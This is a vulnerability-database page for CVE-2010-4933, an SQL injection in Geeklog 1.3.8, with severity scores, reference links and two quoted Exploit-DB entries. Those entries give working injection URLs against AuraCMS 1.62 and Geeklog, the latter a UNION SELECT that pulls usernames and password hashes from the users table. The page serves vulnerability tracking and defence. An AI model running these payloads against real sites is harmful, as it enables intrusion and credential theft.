CVE-2010-4933
published 2011-10-09CVE-2010-4933: SQL injection vulnerability in filemgmt/singlefile.php in Geeklog 1.3.8 allows remote attackers to execute arbitrary SQL commands via the lid parameter.
PriorityP344high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
1.01%
58.7th percentile
SQL injection vulnerability in filemgmt/singlefile.php in Geeklog 1.3.8 allows remote attackers to execute arbitrary SQL commands via the lid parameter.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| geeklog | geeklog | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
AuraCMS 1.62 - 'pfd.php' SQL Injection
exploitdb·2010-11-22
CVE-2010-4774 AuraCMS 1.62 - 'pfd.php' SQL Injection
AuraCMS 1.62 - 'pfd.php' SQL Injection
---
AuraCMS (pfd.php) SQL Injection Vulnerability
Author : Arianom ([email protected])
Homepage : http://indonesiancoder.com
Vendor : http://www.auracms.org/
Software : AuraCMS Mod Block Statistik | http://iwan.or.id/download/lihat/1/2-1-6.html
Version : 1.62
Date : November 22, 2010
I. POC & Exploit
http://localhost/pdf.php?id=140+AND+1=2+UNION+SELECT+ind0nesianc0der,1,2,3,4,5,6,7
II. Refrence
AuraCMS 1.62 (stat.php) Remote Code Execution Exploit : http://www.exploit-db.com/exploits/4933/
III. Vendor patch
Currently manufacturers do not provide patches or upgrades.
IV. Credits
Allahu Akbar
INDONESIAN CODER ~ Kill-9 Crew ~ MC Crew
Don Tukulesto ~ kaMtiEz ~ ibl13z ~ N4ck0 ~ Yurakha ~ aN93l1c ~ Mboys ~ Contrex ~ n4KuLa_
k4L0ng666 ~ Xr0b
Exploit-DB
GeekLog 1.3.8 (filemgmt) - SQL Injection
exploitdb·2010-09-23
CVE-2010-4933 GeekLog 1.3.8 (filemgmt) - SQL Injection
GeekLog 1.3.8 (filemgmt) - SQL Injection
---
GeekLog v1.3.8 (filemgmt) SQL Injection Vulnerability
###########################
Author : Gamoscu
Homepage : http://www.1923turk.com
Blog :http://gamoscu.wordpress.com/
Script : http://www.geeklog.net/filemgmt/viewcat.php?cid=8
Download:http://www.geeklog.net/filemgmt/viewcat.php?cid=8
###########################
[ Vulnerable File ]
filemgmt/singlefile.php?lid=1 [ SQL ]
[ XpL ]
-1+union+all+select+1,2,concat_ws(username,0x3a,passwd),4,5,6,7,8,9,10,11,12,13,14,15,16+from+gl_users+limit+1,1--
[ Demo]
http://server/filemgmt/singlefile.php?lid=-1+union+all+select+1,2,concat_ws(username,0x3a,passwd),4,5,6,7,8,9,10,11,12,13,14,15,16+from+gl_users+limit+1,1--
##############################################################
#
#
#
# Baybor
No writeups or analysis indexed.
http://packetstormsecurity.org/1009-exploits/geeklog138-sql.txthttp://securityreason.com/securityalert/8457http://www.exploit-db.com/exploits/15091http://www.securityfocus.com/bid/43458http://packetstormsecurity.org/1009-exploits/geeklog138-sql.txthttp://securityreason.com/securityalert/8457http://www.exploit-db.com/exploits/15091http://www.securityfocus.com/bid/43458
2011-10-09
Published